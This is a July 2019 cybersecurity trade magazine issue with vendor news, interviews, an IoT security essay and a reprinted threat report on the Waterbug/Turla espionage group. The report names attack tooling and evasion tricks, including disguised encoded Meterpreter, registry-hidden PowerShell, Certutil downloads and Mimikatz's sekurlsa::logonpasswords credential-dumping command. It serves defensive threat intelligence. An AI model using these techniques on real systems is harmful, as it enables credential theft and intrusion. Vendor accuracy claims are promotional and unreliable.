SPECIAL SUPPLEMENT BY
TRENDS FOR CYBER AND INDUSTRIAL SECURITY EXECUTIVES
JULY 2019
GEORGE EAPEN, GROUP CISO, PETROFAC
YOU GOT TO HAVE IT ‘RIGHT’
“Though cybersecurity is a challenging field, with the right skills we stand a greater chance of successfully defending our organizations”
CONTENTS JULY 2019
DEEP DIVE: Invisible security
TRENDING: Why is security becoming an important consideration only now?
TOP EXECUTIVE: You Got to Have It ‘Right’
PARTNER PROGRAM: A Winning Strategy
WHITEPAPER: Huawei releases white paper on intellectual property
Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments
REAL-LIFE
Exploit Using Microsoft Excel Power Query for Remote DDE Execution Discovered
SURVEY
VENDOR TALKS: Minimizing the Threat Landscape Through Augmenting Human Security Teams
TOP OF MIND: Addressing the cyber warfare of the future
DEEP DIVE: The impersonators of the internet
SearchInform
Epicor ERP Positioned as a Visionary in Gartner 2018 Magic Quadrant for Cloud ERP for Product-Centric Midsize Enterprises
MANAGING DIRECTOR: TUSHAR SAHOO
EDITORIAL
CEO: RONAK SAMANTARAY DIRECTOR & EDITOR: ANUSHREE DIXIT anushree@gecmediagroup.com SUB EDITOR: DIVSHA BHAT divsha@gecmediagroup.com EVENTS EXECUTIVE: SHRIYA NAIR shriya@gecmediagroup.com
THE WEEKEND WORRY!

The ransomware attacks planned and deployed on Thursday evenings have been the talk of the town recently. As organizations and their employees gear up for the weekend, there is someone out there waiting for you to shut down your devices for the next two days. What’s next? The entire network is crippled and you are compromised. A few organizations in the UAE (not named here owing to confidentiality issues) that were attacked in the last couple of weeks have given in to the attackers’ demands and paid the ransom in Bitcoins. Indeed, a worry! Especially when we are living and breathing in an era that is defined by cutting-edge, ultra-modern, AI-embedded security solutions.

There is a dire need to raise the bar higher for security professionals and revisit their skill sets. As George Eapen, CISO of Petrofac, says: “The MENA region is filled with cybersecurity experts. But what we lack is not the quantity but the quality of people with the RIGHT skills. A person may have a cybersecurity certification but if he or she does not have a specific skill to do the job, if the right attitude, it would be of no use to the organization. My general observation is that there are people around but with missing skills.”

Cybersecurity is a vast domain in which to build expertise in various security subjects such as identity and access management, endpoint protection, etc. But George says that the key skill any CISO needs is presence of mind. “He or she should be a clear thinker and good communicator who can articulate business or cyber risk in a simple language that non-cyber or non-IT people understand. By ensuring that one is not breaking the existing operations or making employee experience difficult, they should always balance the act,” he comments.

In this issue we also explore how Aruba is beckoning CISOs to augment human security teams by readjusting policies and controls. Also in focus is a survey by SearchInform presenting the relevant level of data risk awareness and expertise from across 10 industries, including IT, power engineering, manufacturing and transport, finance and banking, retail, hospitality, healthcare, state defense, logistics and construction.

Hope you find it relevant.

ANUSHREE DIXIT
Editor & Director
anushree@gecmediagroup.com
SALES MANAGER : NEHA SHARMA neha@gecmediagroup.com GROUP SALES HEAD: RICHA S richa@gecmediagroup.com + 971 529 943 982
VISUALIZER: MANAS RANJAN LEAD VISUALIZER: DPR CHOUDHARY DESIGNER: AJAY ARYA ASSISTANT DESIGNER: RAHUL ARYA
SUBSCRIPTIONS INFO@GECMEDIAGROUP.COM SOCIAL MARKETING & DIGITAL COMMUNICATION YASOBANT MISHRA yasobant@gecmediagroup.com
DESIGNED BY
PRINTED BY AL GHURAIR PRINTING & PUBLISHING LLC. MASAFI COMPOUND, SATWA, P.O.BOX: 5613, DUBAI, UAE
PUBLISHED BY ACCENT INFOMEDIA MEA FZ-LLC
PO BOX : 500653, DUBAI, UAE
223, BUILDING 9, DUBAI MEDIA CITY, DUBAI, UAE
PHONE : +971 (0) 4368 8523
31 FOXTAIL LAN, MONMOUTH JUNCTION, NJ - 08852 UNITED STATES OF AMERICA
PHONE NO: + 1 732 794 5918
A PUBLICATION LICENSED BY INTERNATIONAL MEDIA PRODUCTION ZONE, DUBAI, UAE
@COPYRIGHT 2013 ACCENT INFOMEDIA. ALL RIGHTS RESERVED. WHILE THE PUBLISHERS HAVE MADE EVERY EFFORT TO ENSURE THE ACCURACY OF ALL INFORMATION IN THIS MAGAZINE, THEY WILL NOT BE HELD RESPONSIBLE FOR ANY ERRORS THEREIN.
NEWS
UAE’s Cyber-threat Landscape Reaches Critical Level: Report

DarkMatter Group released the first semi-annual Cyber Security Report for 2019, revealing that critical infrastructure sectors, including Oil & Gas, Financial, Utilities and Transportation, are in the firing line from a growing incidence of cyberattacks across the UAE and wider Middle East. The report analyzes threats and trends observed by DarkMatter between October 2018 and March 2019, providing a snapshot of the cybersecurity environment in the UAE and the wider region.

The Middle East breaches are widespread, frequently undetected, and increasingly appear to be state-sponsored. Cybercriminals are aiming their weapons where it hurts the most: at critical infrastructure, with potentially devastating effects on the security of nations and their citizens. The report found that the most significant threats to regional critical infrastructure organizations came from eight malicious threat actors and campaigns, motivated by espionage and then sabotage. Spear phishing was found to be the principal method of attack to gain access to targets.

“Cybersecurity breaches in the region pose a genuine risk to critical sectors as cybercriminals harness new technologies to launch sophisticated and targeted attacks,” said Karim Sabbagh, CEO of DarkMatter Group. “The intent of the attacks we’re observing is to undermine the progressive social, economic, and digital agendas in the Middle East. Organizations in the region have a short window of time to transform their cybersecurity posture and demonstrate stronger resilience in the face of escalating and increasingly sophisticated cybersecurity threats.”
LASER-POWERED SENSOR TO OPEN UP ‘ANONYMISED’ SECURITY ERA

A sensor that uses an array of lasers to detect objects, people and vehicles could herald an era of anonymised surveillance that isolates threats from uninvolved people or objects. Cepton Technologies’ 3D Lidar detection system, the Vista-Edge™ Perception Evaluation Kit (PEK), uses lasers to scan the environment in much the same way a radar does, but at a much higher resolution, building an image of the world around it regardless of lighting conditions.

Presenting the technology in the UK for the first time at IFSEC International in London’s ExCeL on June 20, Cepton’s Neil Huntingdon says that because the device combines the sensor with a powerful micro-computer in a single package, it can process the information directly at the “edge” and highlight only potential threats, such as an intruder or a suspicious package. This then guarantees the anonymity of those not involved in any suspicious incident.

Neil, Cepton’s VP of Business Development, said: “Our technology allows for far greater protection of data – because it allows operators to zero in on possible issues in a way other technology cannot.

“There are many advantages to this; most notably Lidar can see in the dark, it only transmits a fraction of the information a video would, reducing the burden of data storage and network bandwidth charges, while opening the door to more mobile installations.

“Perhaps most importantly it means we can guarantee the anonymity of people or objects not deemed a threat. This is a step-change from existing technology, where everyone’s face is captured and held on video storage, regardless of whether they were involved in an incident or not.”

In addition to being more dynamic than video technology, the system has been designed with user simplicity in mind. “You hand someone a camera and they know what it is and what to do with it. This is often not the case with a Lidar and Cepton intends to change that,” said Jerone Floor, Head of Product at Cepton.
People Remain the Biggest Threats to ICS: Survey

People remain the greatest threat to industrial control systems (ICS) and associated networks, according to a new SANS survey focused on better understanding cybersecurity risks to operational technology (OT) systems. More than half of respondents also see the cyber risks to their safe and reliable operations as high or higher than in past years.

Three hundred and forty-eight security professionals worldwide, representing IT, OT and hybrid IT-OT domains, provided their thoughts in the SANS 2019 State of OT/ICS Cybersecurity Survey. Sixty-two percent of those surveyed believe people are the greatest risk to cyber security compromise, trailed by technology (22%) and processes and procedures (14%).

“The obvious concern about the risk that people represent—whether they are malicious insiders, careless employees or nation-state bad actors—is consistent across industries,” noted survey co-author and SANS Senior Analyst Barbara Filkins. “We were a little surprised at the lower-ranking concern around process, given that there is significant complexity involved in ICS design, implementation and operation to safeguard OT systems. It’s possible recent attacks that almost always include tried-and-true tactics that exploit human-factors might have impacted our respondents’ perceptions.”

Survey takers told SANS that identifying connected assets and gaining visibility into device, network and control system integrity remains an issue: 45.5% consider it a leading focus for their organisations. That aligns with traditional IT security concerns in which identifying and tracking assets and networks remains a challenge. Not surprisingly, mobile devices (including those used remotely to augment and replace ICS workstations), and wireless communications solutions are contributors to overall risks and threat exposure.

Survey co-author and director of SANS Industrials & Infrastructure business portfolio Doug Wylie said, “We know from previous SANS research that the addition of ‘things’ and mobile devices to ICS represents significant risk. We see in our newest results that practitioners struggle mightily with how to offset these mounting challenges.”

SANS SENIOR ANALYST BARBARA FILKINS & SANS INDUSTRIALS & INFRASTRUCTURE BUSINESS PORTFOLIO DOUG WYLIE
TREND MICRO NAMED LEADER IN ENTERPRISE EMAIL SECURITY BY FORRESTER WAVE

Trend Micro Incorporated has been named a leader in enterprise email security in The Forrester Wave™: Enterprise Email Security, Q2 2019 report. Trend Micro earned the highest possible score in the “technology leadership” sub-criterion (under the product strategy criterion), “deployment options” and “cloud integration,” and received the highest score among all 12 appraised vendors in the strategy category.

Forrester describes Trend Micro with comments including, “Clients cite effectiveness, ease of deployment, and configurability as strengths.” Forrester additionally said, “Enterprises seeking a solution for defending against malicious and malware-laden emails should consider Trend Micro.”

“The number one threat vector continues to be email, which drives our commitment to continued innovation,” said Dr. Moataz Bin Ali, Vice President Trend Micro Middle East and North Africa. “Analyst evaluations are critical for solution assessment. In my view, this recent report takes into account our newer artificial intelligence (AI) features such as writing style analysis and computer vision, alongside solutions to protect cloud email platforms like Office 365 and Gmail that collectively helped us block over 41.5 billion threats in 2018.”

Nearly 86% of all threats blocked by Trend Micro last year came via email. Phishing, business email compromise (BEC), malicious URLs, malevolent attachments and accidental and deliberate data loss are all common challenges. Enterprises that use Trend Micro get a winning formula of decades of email security expertise combined with the strategic vision to anticipate the next threats. This combination continues to position Trend Micro at the forefront of the industry.
Infoblox Unveils Simplified Security Platform

Infoblox launched BloxOne Threat Defense, the industry’s first hybrid security offering that leverages DNS as the first line of defense to detect and block today’s sophisticated cyberthreats. With a scalable hybrid architecture, BloxOne Threat Defense secures enterprises’ existing networks as well as digital transformations like cloud, IoT and SD-WAN deployments. It makes an organization’s threat analysts more productive and reduces the total cost of enterprise threat defense.

The BloxOne Threat Defense solution combines the best of Infoblox’s on-prem (ActiveTrust) and cloud-based (ActiveTrust Cloud) security solutions into a unique integrated hybrid offering that provides enterprises scale, flexibility, and reliability. This enhanced solution reduces incident response time by providing actionable intelligence to the organization’s security stack, including SOAR (Security Orchestration Automation and Response), and by automating action using extensive ecosystem integrations.

Enterprises require a scalable, simple, and foundational security solution that can catch threats in today’s dynamic networks. DNS, critical to the fabric of the Internet and any IP-based communication, is also the least common denominator that can serve as the perfect foundation for security because it is ubiquitous in networks, is needed for connectivity and can scale to the size of the Internet. BloxOne Threat Defense presents a hybrid deployment that ensures enterprise networks will be protected anytime, anywhere, leveraging the infrastructure organizations already own – DNS. resiliency and redundancy.

“With BloxOne Threat Defense, Infoblox is providing customers with a solution that protects everywhere, offers flexible deployment, and integrates with the security stack already in place, providing a more optimized and streamlined cybersecurity posture,” said Kanaiya Vasani, executive vice president of products and corporate development at Infoblox.

KANAIYA VASANI, EXECUTIVE VICE PRESIDENT OF PRODUCTS AND CORPORATE DEVELOPMENT, INFOBLOX

SOPHOS BOOSTS INTERCEPT X FOR SERVER WITH ENDPOINT DETECTION AND RESPONSE

Sophos unveiled Intercept X for Server with Endpoint Detection and Response (EDR). By adding EDR to Intercept X for Server, IT managers can investigate cyberattacks against servers, a sought-after target due to the high value of data stored there.

Cybercriminals frequently evolve their methods and are now blending automation and human hacking skills to successfully carry out attacks on servers. This new type of blended attack combines the use of bots to identify potential victims with active adversaries making decisions about who and how to attack. The SophosLabs Uncut article, Worms Deliver Cryptomining Malware to Web Servers, underscores how easy it is for cybercriminals to leverage bots to discover soft targets. The report explains an automated attack that can deliver a wide range of malicious code to servers that, as a class, tend to lag behind normal update cycles.

Once the bots identify potential targets, cybercriminals use their savvy to select victims based on an organization’s scope of sensitive data or intellectual property, ability to pay a large ransom, or access to other servers and networks. The final steps are cerebral and manual: break in, evade detection and move laterally to complete the mission. This could be to quietly sneak around to steal intelligence and exit unnoticed, disable backups and encrypt servers to demand high-roller ransoms, or use servers as launch pads to attack other companies.

“Blended cyberattacks, once a page in the playbook of nation state attackers, are now becoming regular practice for everyday cybercriminals because they are profitable. The difference is that nation state attackers tend to persist inside networks for long lengths of time whereas common cybercriminals are after quick-hit money making opportunities,” said Dan Schiappa, chief product officer, Sophos.

DAN SCHIAPPA, SENIOR VICE PRESIDENT AND GENERAL MANAGER OF PRODUCTS, SOPHOS
Mimecast Names Top Channel Performers at Middle East Partner Connect

Mimecast revealed the winners of its Middle East Partner Awards 2019. Five channel partners from the UAE were recognised across six categories for their performance over the past year. Mimecast revealed the winners during its annual Mimecast Partner Connect, held in Dubai, UAE in June 2019. The following partners were recognised as top performers during the prior financial year:

• Largest Deal – IDC
• Legend of The Year – Sincy Santosh, Bulwark Technologies
• Technical Legend of the Year – Deepu Thomas, Bulwark Technologies
• Growth Partner of the Year – Cloud Dynamics
• Technical Services Partner of the Year – Teksalah
• Partner of The Year – Newlogic

Mimecast’s Vice President of Channel Operations, Dan Gradidge, and Director of Channel Programs, Nikki Downing, attended the event to honour the top performing partners and to provide a comprehensive overview of the Mimecast Global Partner Program.

As a channel-focused business, Mimecast has worked closely with its regional partners to help them successfully integrate Mimecast solutions into their full suite of ICT solutions under the Global Partner Program. The Program is designed to offer more rewards resellers can leverage to attract new clients into long term business relationships and build their reputations as trusted business advisors.

At the event, attendees received an update on the program and were introduced to collateral and supporting information that can help them offer customers guidance to solve their cyber resilience challenges. Partners also learned more about product roadmaps, the Legendary Customer Success program and Mimecast’s interoperability with several leading complementary technology vendors via its API partnerships.

“We are privileged to work with some of the best channel partners in the Middle East who are committed to helping businesses improve their security and compliance, with solutions that mitigate risk and reduce the cost and complexity of becoming cyber resilient organisations,” said Nikki Downing, director of channel programs, Mimecast. “It gives us great pleasure to recognise the passion and commitment of five partners from the region who are committed to helping customers solve their cyber resilience challenges.”
Entrust Datacard Completes Purchase of nCipher Security

Entrust Datacard completed its previously announced acquisition of nCipher Security, formerly Thales’s market-leading general purpose hardware security module (HSM) business.

The general purpose HSM market is growing quickly, driven by global demand for stronger data and application security, increased encryption, and privacy regulations such as the EU General Data Protection Regulation (GDPR) and the electronic identification, authentication and trust services (eIDAS) regulation. HSMs offer the highest levels of cryptographic security, and are deployed to minimize network and cybersecurity risks from cloud services and Internet of Things (IoT) devices and other digital initiatives.

“We are extremely pleased to complete this acquisition and bring nCipher’s exceptional talent and technology into the Entrust Datacard portfolio. The need for secure network access and data integrity continues to multiply – from mobile devices and cloud services to connected IoT devices and digital payments. The use of HSMs is expanding across all of these domains. With nCipher now part of our solution portfolio, customers will see benefit from our expanded offerings for the most sensitive, high assurance use cases,” said Todd Wilkinson, president and CEO of Entrust Datacard.

General purpose HSMs are a core component of Entrust Datacard’s solutions and are an underlying part of the security infrastructure of the company’s public key infrastructure (PKI) and secure sockets layer (SSL) offerings. Entrust Datacard will offer the nCipher solution with its on-premise and managed PKI offerings, and its IoT device credentialing, authorization and lifecycle management offerings. By joining Entrust Datacard, nCipher will be able to expand its compliance capabilities from trusted hardware to include trusted identities, and grow its cloud capabilities to offer customers more advanced solutions from Entrust Datacard’s secure hosting facilities.
DEEP DIVE
INVISIBLE SECURITY

The leadership at neoEYED claims that they are building the next generation of AI, not a simple machine learning algorithm... Something that will make the others’ AIs look like toys. neoEYED AI monitors 100+ behavioral factors to detect anomalies and prevent account takeover in real time.

FRAUDS ARE ON THE RISE!

Banks, fintech companies and large enterprises lose millions of dollars every year due to security breaches, identity frauds, social engineering frauds, password sharing…. Today, all the frauds happen on an authenticated session, leaving a huge gap to be filled. There are plenty of technologies available on the market to reduce frauds and improve security, like biometrics, SMS/OTP, token verification… They help prevent a great deal, but they add friction and pose a barrier to entry for users, ruining the customer experience.

INVISIBLE SECURITY

neoEYED is a Behavioral AI: a fraud detection/prevention solution that recognizes the users just by looking at “how” they interact with the applications and type their credentials. It’s a simple package that banks and enterprises can integrate in their web, mobile or internal applications. The AI automatically looks at over 100 different behavioral patterns in the background, without disturbing the users. The result is a secure, frictionless layer that continuously monitors the behavior of the users and protects the organization from any unforeseen frauds without asking for any token, permissions or personal information. Invisible, simple, secure!

CASE STUDY

neoEYED introduced its technology to a few of the largest banks in India, asking their employees to type their username/password credentials as they normally do on a web portal. Then the users were asked to impersonate other users by spying on and typing their credentials. neoEYED was able to deliver impersonation alerts with 100% accuracy on over 150 fraudulent attempts. All frauds and legitimate users were correctly identified without error just by looking at the way the users typed their username.

This solution won over 12 awards and accolades from NPCI, RBL Bank, PwC, MasterCard, IBM, BBVA, Vizag FinTech Festival, DCB Bank… and today is part of Mach37 Cyber security accelerator, PayPal Incubator, Cultiv8, Catalyst.

“neoEYED helps banks and business to reduce up to 99% of frauds with a Behavioural AI that recognises the users just by looking at the way the users interact with their devices. Invisible, simple, secure. Made by a strong team of experts in cybersecurity and biometrics, who won 12 awards all around the world from companies like Mastercard, PwC, IBM, NPCI, BBVA.”

neoEYED Vision: “neoEYED vision is to kill the password one day!”

ALESSIO MAURO, CEO, NEOEYED, INC
TRENDING
WHY IS SECURITY BECOMING AN IMPORTANT CONSIDERATION ONLY NOW?
Organizations need to keep up to date and beat hackers at their own game. Ersin Uzun, the VP and Director of System Sciences Laboratory at PARC, a Xerox company, discusses the topic further.

ERSIN UZUN, VICE PRESIDENT, DIRECTOR OF SYSTEM SCIENCES LABORATORY, PARC, A XEROX COMPANY

Today, cyber security is becoming more important than ever: hackers are getting smarter and constantly changing their tactics. IoT is expanding rapidly and, with more connected devices, more personal information is shared online. As a result, hacking tools are becoming more sophisticated.

Over the past decade, we’ve seen a proliferation of smart devices that possess the capabilities of information processing and network connectivity. The defining characteristic of the Internet of Things (IoT) is that devices, previously restricted to their physical environment, are now connected to a computer network. This network could be a home network, an industrial intranet or even the whole internet. This means that a device, or a gateway that connects a device to the network, is accessible by someone who presents the right credentials, or bypasses the credentials altogether.

As computation and connectivity have become commoditized, they have spawned a plethora of solutions that automate, improve and simplify key tasks in industrial control — from gathering sensor readings on the performance targets of a conveyor-based motor car production line, to verifying the freshness of a food shipment in a smart supply chain, to programming a CNC machine to precisely cut a block of metal into the right shape. They have also, unfortunately, exposed a rich attack surface that can be exploited by malicious hackers.

Consider, for example, the infamous Stuxnet worm that was used to attack Iranian nuclear installations. A malicious program was inserted into the unit that controlled the operation of the centrifuges in the nuclear reactor. This program caused infrequent changes in the speed at which the centrifuges rotate, which, over a period of time, would cause the centrifuges to deteriorate and fail. What made Stuxnet extremely hard to detect was that the telemetry from the centrifuges was spoofed, i.e., whenever the controller was asked to report the speed of the centrifuges, it would still report benign, expected values rather than the altered velocities induced by the worm.

DESIGNED-IN SECURITY IS A WORTHY OBJECTIVE, BUT HARD TO ACHIEVE

It is often claimed that the way to address this new set of cyber-physical security challenges is to construct systems that are “secure by design.” This requires a system designer to develop an understanding of an attacker’s incentives and the various ways in which he or she can compromise the operations of the system. In the recent Mirai botnet attacks, for example, the adversaries accessed their targets using commonly used default passwords, which had never been altered by their users. This simple attack infiltrated tens of thousands of devices.

The goal of designed-in security is to incorporate measures and protocols that will prevent as many known attack scenarios as possible. A bigger challenge for the security engineer is figuring out how to deal with attack methods that are hitherto unknown, and to design the system in such a way that it can mitigate the negative consequences of such novel attacks. This is a precarious undertaking, and for many IoT systems, this type of designed-in security may be hard to achieve. That’s because many systems — think of the smart power grid, portions of which may have been in operation for decades — contain legacy equipment with old processes and protocols that must be brought up to date with current security best practices, a task easier said than done.

IT’S NOT JUST LEGACY DEVICES THAT ARE HARD TO SECURE

Some industrial and enterprise applications require a new class of lightweight, low-power, cheap sensors that are deployed in swarms of hundreds or thousands. These devices may power up intermittently or be passive and draw power from other devices in their vicinity. They might engage in opportunistic communication with listening devices in their neighborhood but could remain silent most of the time. The secure communication and storage mechanisms that are typically deployed in cybersecurity solutions are far too complex to be implemented on such lightweight devices. In addition to the conventional protocols for secure communication, secure data storage and key management, we need security approaches that inter-operate across a vast range of device capabilities.
PARTNER PROGRAM
A WINNING STRATEGY
Cyber Sentinels in an exclusive interview with Jason Ellis, EMEA VP Channel for FireEye on partner programs, channel strategies and expansion plans.
Tell us about FireEye Fuel Academy. FireEye Fuel Academy is our channel partner event that we host in multiple countries every year. It is an opportunity for FireEye team to meet all the channel partners in the regions, and discuss about the channel strategy. We update them about our business and technical solutions at the event. An intro to the FireEye channel program? What’s in it for the partners? Explain promotions, rebates, SPIFFs, channel focused products? The FireEye partner program is based on a common structure of platinum, gold and silver partners. In the past 12 months, we have initiated a lot of activities that offer additional value to our channel partners. This includes: •Back-end rebate: This a brand new and lucrative program. In this program, if the partners achieve a revenue goal around deal registration, we will pay them a back-end rebate. This program was introduced this year. •Front-end protection: FireEye makes sure that any opportunities registered by our partners are protected. So, we win and lose with our partners who have registered those opportunities. •Incumbency protection program: Under this program, FireEye protects the original license transacted by partners. This means that if any other partner attempts to compete, we will pay a premium versus the incumbent partner. In this scenario, the partner is protected from the original deal registration, the sales on that will go towards the goal and the partners are protected in the future years as well. •SPIFF: This program provides sales performance incentives and recognitions to the sales and technical team members based on the net new customers introduced to FireEye. Also, in order to be much more focused, we have reduced the number of partners in our program. To you give an example – we have
JASON ELLIS, EMEA VP CHANNEL, FIREEYE
halved the number of gold partners. We have applied the similar strategy for our platinum and silver partners. Tell us about your expansion plans in Africa. FireEye is investing heavily in African region. We have about 54 employees in the region and are expanding our territory sales. We see an excellent demand in the region for our services. Provide an outline of future channel plans and how they will be incorporated in the Middle East & Africa region.
FireEye will continue to focus on a target number of partners. Adopting this strategy has been a winning formula for FireEye in terms of driving gross revenue through the channel. Additionally, we will continue to evolve our MSSP Partner Program. Different ways of consuming our technologies on a monthly or annual basis plays an important role when it comes to our channel partners. We will also continue to equip our partners with management tools which will allow them to build services. Focusing on fewer, but more strategic partners, continuing to protect our partners profitability, and modernising how we go to market is going to be our strategy for the future. ë
WHITEPAPER
HUAWEI RELEASES WHITE PAPER ON INTELLECTUAL PROPERTY
Huawei released a white paper on innovation and intellectual property (IP), and warned against the issue being politicized. Speaking at a press conference at the company’s headquarters, Song Liuping, Huawei’s chief legal officer, said that IP is the cornerstone of innovation and its politicization threatens progress across the world. “If politicians use IP as a political tool, they will destroy confidence in the patent protection system. If some governments selectively strip companies of their IP, it will break the foundation of global innovation,” said Song. The paper, titled “Respecting and Protecting Intellectual Property: The Foundation of Innovation,” elaborates on Huawei’s practices in and contributions to innovation and the protection of IPR. It notes that innovation and intellectual property protection lie at the heart of Huawei’s success over more than 30 years. As of the end of 2018, Huawei has been granted 87,805 patents, of which 11,152 are U.S. patents. Since 2015, Huawei has received over 1.4 billion U.S. dollars in licensing revenue. Aside from accumulating patents of its own, Huawei has also paid more than 6 billion U.S. dollars in royalties to legally implement the IP of other companies, with nearly 80% of that paid to American companies, according to the document. Intellectual property is private property, protected by the law, and disputes should be resolved through legal proceedings, said Song, adding that in the past 30 years, no court has ever concluded that Huawei engaged in malicious IP theft, and Huawei has never been required by the court to pay damages for this. Huawei’s collaborative and respectful approach to IP is demonstrated by the simple fact that many of its technology breakthroughs are incorporated into the open standards that govern 3G, 4G and 5G.
As a result, even though some countries do not buy products directly from Huawei, they still use the essential patents of Huawei, and share in the benefits of the technology Huawei creates, said Song.
DR. SONG LIUPING,
CHIEF LEGAL OFFICER, HUAWEI
Song also addressed Huawei’s stance on its use of patents, saying the company will not weaponize its portfolio of patents. Rather, he said, Huawei will adopt an open and cooperative attitude and follow the FRAND principle, or “fair, reasonable, and non-discriminatory,” when engaging with relevant parties in the industry on patent licensing. “As always, Huawei is ready and willing to share our technology with the world. That includes 5G. It includes U.S. companies and U.S. consumers. Together, we can drive our industry forward and advance technology for all mankind,” said Song. The document also elaborates on how sustained innovation has helped Huawei’s success; how Huawei’s innovation brings huge social value; and Huawei’s stance on the use of third parties’ IPR and its own.
REAL-LIFE
WATERBUG: ESPIONAGE GROUP ROLLS OUT BRAND-NEW TOOLSET IN ATTACKS AGAINST GOVERNMENTS
Waterbug may have hijacked a separate espionage group’s infrastructure during one attack against a Middle Eastern target.
The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage group’s infrastructure.
THREE WAVES OF ATTACKS
Recent Waterbug activity can be divided into three distinct campaigns, characterized by differing toolsets. One campaign involved a new and previously unseen backdoor called Neptun (Backdoor.Whisperer). Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers. This passive listening capability makes the malware more difficult to detect. Neptun is also able to download additional tools, upload stolen files, and execute shell commands. One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus (aka OilRig, APT34).
A second campaign used Meterpreter, a publicly available backdoor along with two custom loaders, a custom backdoor called photobased.dll, and a custom Remote Procedure Call (RPC) backdoor. Waterbug has been using Meterpreter since at least early 2018 and, in this campaign, used a modified version of Meterpreter, which was encoded and given a .wav extension in order to disguise its true purpose.
The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This tool is designed to bypass detection aimed at identifying malicious PowerShell usage. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry. This was probably done to avoid them being written to the file system.
RETOOLED
Waterbug’s most recent campaigns have involved a swath of new tools including custom malware, modified versions of publicly available hacking tools, and legitimate administration tools. The group has also followed the current shift towards “living off the land,” making use of PowerShell scripts and PsExec, a Microsoft Sysinternals tool used for executing processes on other systems. Aside from new tools already mentioned above, Waterbug has also deployed:
• A new custom dropper typically used to install Neptun as a service.
• A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable.
• A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive.
• Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers.
• PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs.
• Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool.Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.
VICTIMS
These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in addition to targets in the IT and education sectors. Since early 2018, Waterbug has attacked 13 organizations across 10 different countries:
HIJACKED INFRASTRUCTURE
One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East, Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network. Press reports have linked Crambus and Waterbug to different nation states. While it is possible that the two groups may have been collaborating, Symantec has found no further evidence to support this. In all likelihood, Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover. Curiously though, Waterbug also compromised other computers on the victim’s network using its own infrastructure.
During this attack, a customized variant of the publicly available hacking tool Mimikatz was downloaded to a computer on the victim’s network from known Crambus-controlled network infrastructure. Mimikatz was downloaded via the Powruner tool and the Poison Frog control panel. Both the infrastructure and the Powruner tool have been publicly tied to Crambus by a number of vendors. Both were also mentioned in recent leaks of documents tied to Crambus.
Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for. The variant of Mimikatz used was packed with a custom packing routine that has not been seen before in any non-Waterbug malware. Waterbug used this same packer on a second custom variant of Mimikatz and on a dropper for the group’s custom Neuron service (Trojan.Cadanif). Its use in the dropper leads us to conclude that this custom packer is exclusively used by Waterbug. Additionally, this version of Mimikatz was compiled using Visual Studio and the publicly available bzip2 library which, although not unique, has been used by other Waterbug tools previously.
Aside from the attack involving Crambus infrastructure, this sample of Mimikatz has only been seen used in one other attack, against an education target in the UK in 2017. On that occasion, Mimikatz was dropped by a known Waterbug tool.
In the case of the attack against the Middle Eastern target, Crambus was the first group to compromise the victim’s network, with the earliest evidence of activity dating to November 2017. The first observed evidence of Waterbug activity came on January 11, 2018, when a Waterbug-linked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network. The next day, January 12, the aforementioned variant of Mimikatz was downloaded to the same computer from a known Crambus C&C server. Two further computers on the victim’s network were compromised with Waterbug tools on January 12, but there is no evidence that Crambus infrastructure was used in these attacks. While one of these computers had been previously compromised by Crambus, the other showed no signs of Crambus intrusion.
Waterbug’s intrusions on the victim’s network continued for much of 2018. On September 5, 2018, a similar Mimikatz variant was dropped by Waterbug’s Neptun backdoor onto another computer on the network. At around the same time, other Waterbug malware was seen on the victim’s network which communicated with known Waterbug C&C servers.
Finally, the issue was clouded further by the appearance of a legitimate systems administration tool called IntelliAdmin on the victim’s network. This tool is known to have been used by Crambus and was mentioned in the leak of Crambus documents. However, in this case, IntelliAdmin was dropped by custom Waterbug backdoors, including the newly identified Neptun backdoor, on computers that had not been affected by the Crambus compromise.
The incident leaves many unanswered questions, chiefly relating to Waterbug’s motive for using Crambus infrastructure. There are several possibilities:
1. False flag: Waterbug does have a track record of using false flag tactics to throw investigators off the scent. However, if this was a genuine attempt at a false flag operation, it begs the question of why it also used its own infrastructure to communicate with other machines on the victim’s network, in addition to using tools that could be traced back to Waterbug.
2. Means of intrusion: It is possible that Waterbug wanted to compromise the target organization, found out that Crambus had already compromised its network, and hijacked Crambus’s own infrastructure as a means of gaining access. Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point.
3. Mimikatz variant belonged to Crambus: There is a possibility that the version of Mimikatz downloaded by the Crambus infrastructure was actually developed by Crambus. However, the compilation technique and the fact that the only other occasion it was used was linked to Waterbug works against this hypothesis. The fact that Waterbug also appeared on the victim’s network around the same time this version of Mimikatz was downloaded would make it an unlikely coincidence if the tool did belong to Crambus.
